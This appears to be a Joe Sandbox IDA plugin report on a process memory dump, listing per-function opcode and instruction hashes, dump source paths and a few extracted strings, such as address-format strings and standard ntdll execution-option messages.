                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27b8a40c44056aaaea340e6fbaa86d92b735123e8aaf1dc5763e7f03c345d032
                                                      • Instruction ID: 582780dc4cbe9027a3cfcc94bfa719023b3f358872e2e4f63cd469382d794646
                                                      • Opcode Fuzzy Hash: 27b8a40c44056aaaea340e6fbaa86d92b735123e8aaf1dc5763e7f03c345d032
                                                      • Instruction Fuzzy Hash: 8890023160140802D1807558480468B001997D1301F95C115B4029754ECA158B5A77A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e08539872ef7fb56abaf9f1799c797a184622e762fabbf953c617a85ff123abf
                                                      • Instruction ID: bafddcc67570bddb99f47d98d03263116fcf627a32c8f1a4a78dfce8c7d53337
                                                      • Opcode Fuzzy Hash: e08539872ef7fb56abaf9f1799c797a184622e762fabbf953c617a85ff123abf
                                                      • Instruction Fuzzy Hash: FE900231A0540802D15075584814787001997D0301F55C111B4028754EC7558B5677A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8df28d99798126962fbb3b16d3e31ec9e20259b8fc86e8e34fb1631ce5a1a1e7
                                                      • Instruction ID: 4ce90f233dfa97549dc463fdd13c54a813f96a76a4b804871d8f16f78971c4c3
                                                      • Opcode Fuzzy Hash: 8df28d99798126962fbb3b16d3e31ec9e20259b8fc86e8e34fb1631ce5a1a1e7
                                                      • Instruction Fuzzy Hash: 1990023160140802D10475584C046C7001997D0301F55C111BA028755FD66589927231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fd83bedb9c482c17bd871f7d7795df464648aae3eaa07fa7e24108c176ac3ca
                                                      • Instruction ID: a82279eaef2d5856c494d71b4466d99d626a5478ee916a83462166739dda2116
                                                      • Opcode Fuzzy Hash: 6fd83bedb9c482c17bd871f7d7795df464648aae3eaa07fa7e24108c176ac3ca
                                                      • Instruction Fuzzy Hash: D6900225621400020145B9580A0454B0459A7D6351395C115F541A690DC62189666321
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c052e1d47165896875402f43dafe319e107ea026f194ca7f28a563df4716d6ce
                                                      • Instruction ID: 3fffe49c1c3974feff603bda7669d947b01112b311e8fd06bf8a87a8e1d679ca
                                                      • Opcode Fuzzy Hash: c052e1d47165896875402f43dafe319e107ea026f194ca7f28a563df4716d6ce
                                                      • Instruction Fuzzy Hash: F9900225611400030105B9580B04547005A97D5351355C121F5019650DD62189626221
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0367735d904ba0de99d1d5a871b35e8634728900d4372b00b335a54040f88759
                                                      • Instruction ID: 68d7f34f4cdb8c3dab5087b18f5589d415505542f8bdab5a54d879a5bd0280f0
                                                      • Opcode Fuzzy Hash: 0367735d904ba0de99d1d5a871b35e8634728900d4372b00b335a54040f88759
                                                      • Instruction Fuzzy Hash: DB9002A1601540924500B6588804B4B451997E0201B55C116F5058660DC5258952A235
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d3f5dc1cb3bf04834cf90effd358b2c2f6ec4ccb89c58dc5578d698374e5766
                                                      • Instruction ID: 515b2d808c915ee7619eccf3db4ea1af6d54da2adbf2df7a1204f325bd2f02f2
                                                      • Opcode Fuzzy Hash: 0d3f5dc1cb3bf04834cf90effd358b2c2f6ec4ccb89c58dc5578d698374e5766
                                                      • Instruction Fuzzy Hash: 5190022170140003D140755858186474019E7E1301F55D111F4418654DD91589576322
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2896736bd1c45558f58670be876da8786d82f582736b629d2981836a0557e290
                                                      • Instruction ID: 9534a3514ca3088d9701761bd931f54a39d895fc5247efbcea92706b1affbf28
                                                      • Opcode Fuzzy Hash: 2896736bd1c45558f58670be876da8786d82f582736b629d2981836a0557e290
                                                      • Instruction Fuzzy Hash: 8490022160544442D10079585808A47001997D0205F55D111B5068695EC6358952B231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c50586ab1ac678e50b9c223e7559a5c258a93dea059e25bd93f678a4890fdb2
                                                      • Instruction ID: ec2abb7e873f34c535eeaee0232493ab568d4e804ef536429c7fe38148889762
                                                      • Opcode Fuzzy Hash: 3c50586ab1ac678e50b9c223e7559a5c258a93dea059e25bd93f678a4890fdb2
                                                      • Instruction Fuzzy Hash: E890022961340002D1807558580864B001997D1202F95D515B4019658DC915896A6321
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37ba8a62d5678c92ca60afd48b0d419a8f4c97917fa652db950b33021dd3cf32
                                                      • Instruction ID: 3d42a38b286ffb557e427aba0367e3e1e714693bfd5573282394018295ba9c0b
                                                      • Opcode Fuzzy Hash: 37ba8a62d5678c92ca60afd48b0d419a8f4c97917fa652db950b33021dd3cf32
                                                      • Instruction Fuzzy Hash: 7E900221642441525545B5584804547401AA7E0241795C112B5418A50DC5269957E721
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6561654cab14ca47970e689e12ba906e4a3072c3fdb490c0c3bef1f7a62fe88b
                                                      • Instruction ID: 15267ba1cf9ea3eec1531246695f48a95d6435a59a0594420a4a483b628b745a
                                                      • Opcode Fuzzy Hash: 6561654cab14ca47970e689e12ba906e4a3072c3fdb490c0c3bef1f7a62fe88b
                                                      • Instruction Fuzzy Hash: 4390023164140402D14175584804647001DA7D0241F95C112B4428654FC6558B57BB61
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 743cc6c225d4ea7c3127090ed6d6a42b8a4c6808c32af0747fcb3c85f59bf4ba
                                                      • Instruction ID: 421a0678a48329a28931c22a7e9d69f949bb2609646f05e6c259c8a447cd69cf
                                                      • Opcode Fuzzy Hash: 743cc6c225d4ea7c3127090ed6d6a42b8a4c6808c32af0747fcb3c85f59bf4ba
                                                      • Instruction Fuzzy Hash: 4D90023160140842D10075584804B87001997E0301F55C116B4128754EC615C9527621
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c1a005dc34a1b068313b68003dfba9f765d2be1883e0a86209331554b9d849c
                                                      • Instruction ID: cbd809485981f75771cf47953f54d7950360f11a47a186ee19503a36d5a832c6
                                                      • Opcode Fuzzy Hash: 2c1a005dc34a1b068313b68003dfba9f765d2be1883e0a86209331554b9d849c
                                                      • Instruction Fuzzy Hash: FF90023160140403D10075585908747001997D0201F55D511B4428658ED65689527221
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3212f3cab074bc7cad90ee1fca754006bf4893e2f1073b0d49e1cf17a89d6c9d
                                                      • Instruction ID: 5928c4be002b61f500ab65227190695336f2c456400e53e4a935210435ed37a6
                                                      • Opcode Fuzzy Hash: 3212f3cab074bc7cad90ee1fca754006bf4893e2f1073b0d49e1cf17a89d6c9d
                                                      • Instruction Fuzzy Hash: 72900221A0540402D14075585818747002997D0201F55D111B4028654EC6598B5677A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc111efc348186f22080a74591f2621edcdd675cc6dc8eb86bbf4d42742e8bc7
                                                      • Instruction ID: 4bb3a187540f99e8ae0bda280d7916c47d03cc556fb995c93ab2afd887aebf19
                                                      • Opcode Fuzzy Hash: dc111efc348186f22080a74591f2621edcdd675cc6dc8eb86bbf4d42742e8bc7
                                                      • Instruction Fuzzy Hash: F090023160140402D10079985808687001997E0301F55D111B9028655FC66589927231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d93a40ad9f1f31d9ccb71d972073e3bf6b894bca1296fc2cf0c9aacb2eef4015
                                                      • Instruction ID: 7eea379ad48d82d1d126a27243c8e0b994578c7c2a44069bcffd11a9fdd69ddd
                                                      • Opcode Fuzzy Hash: d93a40ad9f1f31d9ccb71d972073e3bf6b894bca1296fc2cf0c9aacb2eef4015
                                                      • Instruction Fuzzy Hash: A290026161140042D10475584804747005997E1201F55C112B6158654DC5298D626225
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acd0d3af64e157c8bca5307f7dbe375d798c6601204e816ae613dd2e916e0fe9
                                                      • Instruction ID: 85827fdca13be65be3c6a05a5885ac76fd36acefe2ad5d620eec2fd5f1f8a1a0
                                                      • Opcode Fuzzy Hash: acd0d3af64e157c8bca5307f7dbe375d798c6601204e816ae613dd2e916e0fe9
                                                      • Instruction Fuzzy Hash: 7D90026174140442D10075584814B470019D7E1301F55C115F5068654EC619CD537226
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4eaa560f911b805770b44e4acfc744febfd080fc277bd576f0c499e3c02241cc
                                                      • Instruction ID: 960e9c4ee8dc741bf810036b521e46bb385d08a6674cd38ef3d4c71de031fd17
                                                      • Opcode Fuzzy Hash: 4eaa560f911b805770b44e4acfc744febfd080fc277bd576f0c499e3c02241cc
                                                      • Instruction Fuzzy Hash: 70900221611C0042D20079684C14B47001997D0303F55C215B4158654DC91589626621
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c22a6cdb42421cb57375658fd4533ff36e979905263ef960b424ad794445fd0e
                                                      • Instruction ID: 8d8755636ef5e04d418c9f0916bed2be32761e68a0946823ef2f89fa17f25d84
                                                      • Opcode Fuzzy Hash: c22a6cdb42421cb57375658fd4533ff36e979905263ef960b424ad794445fd0e
                                                      • Instruction Fuzzy Hash: D790023160180402D10075584C08787001997D0302F55C111B9168655FC665C9927631
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e288e87a111f8a3a945e6e2ba607dcd95682b60220314591e138816b351c4777
                                                      • Instruction ID: 17efea7722245aa643fd2d8cf566122ccb8af1deffaf949c20be22f7e80bbd57
                                                      • Opcode Fuzzy Hash: e288e87a111f8a3a945e6e2ba607dcd95682b60220314591e138816b351c4777
                                                      • Instruction Fuzzy Hash: E1900221A0140042414075688C449474019BBE1211755C221B499C650EC55989666765
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b69a2923e928832a0817bb81d41d1c68767be70b85ebeb72acfc1086a272725e
                                                      • Instruction ID: 90cbecadbbb7e82bf8bab2c24fb1fdbbed182b87bcf429ed8183b634e67ca50d
                                                      • Opcode Fuzzy Hash: b69a2923e928832a0817bb81d41d1c68767be70b85ebeb72acfc1086a272725e
                                                      • Instruction Fuzzy Hash: 5590023160180402D10075584C1474B001997D0302F55C111B5168655EC62589527671
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5354fa723196220c7754cf146bfe2f2cd1ebc38d802c3468f50df89873561ebb
                                                      • Instruction ID: 673578c4cb118c7ed92ac34c754b4e2cfbadb0b056316898dbd71e16af735a00
                                                      • Opcode Fuzzy Hash: 5354fa723196220c7754cf146bfe2f2cd1ebc38d802c3468f50df89873561ebb
                                                      • Instruction Fuzzy Hash: 2790022170140402D10275584814647001DD7D1345F95C112F5428655EC6258A53B232
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf88ed5b962a9d10463eda1d53b7a2c0a4c2019ae51555b68d90659d8e7ab809
                                                      • Instruction ID: 31e03e3c2f8351e93db5a5ce897fbd6ea6108adf852c194bf666d5f27f6dabe6
                                                      • Opcode Fuzzy Hash: bf88ed5b962a9d10463eda1d53b7a2c0a4c2019ae51555b68d90659d8e7ab809
                                                      • Instruction Fuzzy Hash: 4290026160180403D14079584C04647001997D0302F55C111B6068655FCA298D527235
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11ff5feaede1f68f87c3c8e09a5837a0e3fdbf8e65cb54efa6585fe2274f31a0
                                                      • Instruction ID: 76406eb8f64f35bc280264ff41e2467f18802094aaa8a3f8b99b65166c85b5fd
                                                      • Opcode Fuzzy Hash: 11ff5feaede1f68f87c3c8e09a5837a0e3fdbf8e65cb54efa6585fe2274f31a0
                                                      • Instruction Fuzzy Hash: DE90027160140402D14075584804787001997D0301F55C111B9068654FC6598ED67765
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a3f3d5f5985cf13b91096d903eb750c27fc80627568db2b5f254e674924b088
                                                      • Instruction ID: 21f9a2341c93cb785f6cacb1c3f6ae09ce67f25f9c03e6aba25cefaec2df2104
                                                      • Opcode Fuzzy Hash: 0a3f3d5f5985cf13b91096d903eb750c27fc80627568db2b5f254e674924b088
                                                      • Instruction Fuzzy Hash: B4900221A0140502D10175584804657001E97D0241F95C122B5028655FCA258A93B231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1792beb5b98b42ff63d31e9e824d210af926f2d5c562059135edca718bedc5f4
                                                      • Instruction ID: 24c80406cbf5189c170037a53bec3a52cbfba8de37d1f4205143288984db27ee
                                                      • Opcode Fuzzy Hash: 1792beb5b98b42ff63d31e9e824d210af926f2d5c562059135edca718bedc5f4
                                                      • Instruction Fuzzy Hash: AD90022160184442D14076584C04B4F411997E1202F95C119B815A654DC91589566721
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                                      • Instruction ID: ddfa124eb22936ddc555bffbee4075f3f055ce91d7d7b7ed710aa780feeb9ca7
                                                      • Opcode Fuzzy Hash: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                                      • Instruction Fuzzy Hash: EE90022164140802D14075588814747001AD7D0601F55C111B4028654EC6168A6677B1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                                      • Instruction ID: efe09fdd7cafd7f81256dab66ce4962bed382a49aaa1585a856e2a37f641b16e
                                                      • Opcode Fuzzy Hash: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                                      • Instruction Fuzzy Hash: E290022164545102D150755C48046574019B7E0201F55C121B4818694EC55589567321
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                                      • Instruction ID: 012acfd66690d32797e67ac1c0ba28a6882a05859764ee7102b033e05876f23f
                                                      • Opcode Fuzzy Hash: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                                      • Instruction Fuzzy Hash: 6690023560140402D51075585C04687005A97D0301F55D511B4428658EC65489A2B221
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                                      • Instruction ID: 371701308864b20497b3d9984e89a382189ef63d1f2ec91701451150d00d4faf
                                                      • Opcode Fuzzy Hash: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                                      • Instruction Fuzzy Hash: C990023160240142954076585C04A8F411997E1302B95D515B4019654DC91489626321
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: c7d9afe136069f0c68253de7c04ef4060bfab72a4479e3710ef4d3ba6b94f280
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                                      • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                                                      • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                                      • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                                      • Instruction ID: 31a1762dbe1b06c98a7039b48fca7285e93d9210d66678904d50acd939e9a3e2
                                                      • Opcode Fuzzy Hash: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                                      • Instruction Fuzzy Hash: D151E2B5A00646BFCF34DF9DCDA097EBBFDAB44200B04846DE596D7682E774EA408760
                                                      Strings
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01654725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01654655
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01654787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01654742
                                                      • ExecuteOptions, xrefs: 016546A0
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016546FC
                                                      • Execute=1, xrefs: 01654713
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                                      • Instruction ID: 1981ac7a04560acc87b59ce512cf86aee5810d4ad5dd66cb0b8a29404f7ff7ca
                                                      • Opcode Fuzzy Hash: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                                      • Instruction Fuzzy Hash: AC512C31A0022ABAEF11AFA9DC95FBD77B9EF14700F0804DDD505AB285EB719A418F54
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 53d8b8ea8d2954b18b677427825aa517fad5de898047d0d60e1ccfa8029c4fb0
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 64020671508342AFD705DF18C890AAFBBE6EFC8704F04892DF9895B264DB31E985CB56
